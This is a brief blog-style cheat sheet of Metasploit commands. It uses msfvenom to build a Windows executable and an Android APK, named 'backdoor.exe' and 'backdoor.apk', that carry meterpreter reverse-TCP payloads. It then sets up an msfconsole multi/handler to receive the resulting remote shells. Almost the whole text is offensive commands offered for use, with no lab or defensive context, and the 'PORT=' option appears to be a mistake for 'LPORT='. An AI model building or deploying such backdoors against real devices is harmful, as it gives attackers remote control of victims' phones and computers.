MSFVenom


Windows Executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 PORT=9999 -f exe > backdoor.exe

Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 PORT=9999 R > backdoor.apk

msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp 
set LHOST (your ip)
set LPORT (your port)
exploit

Comments

Popular Posts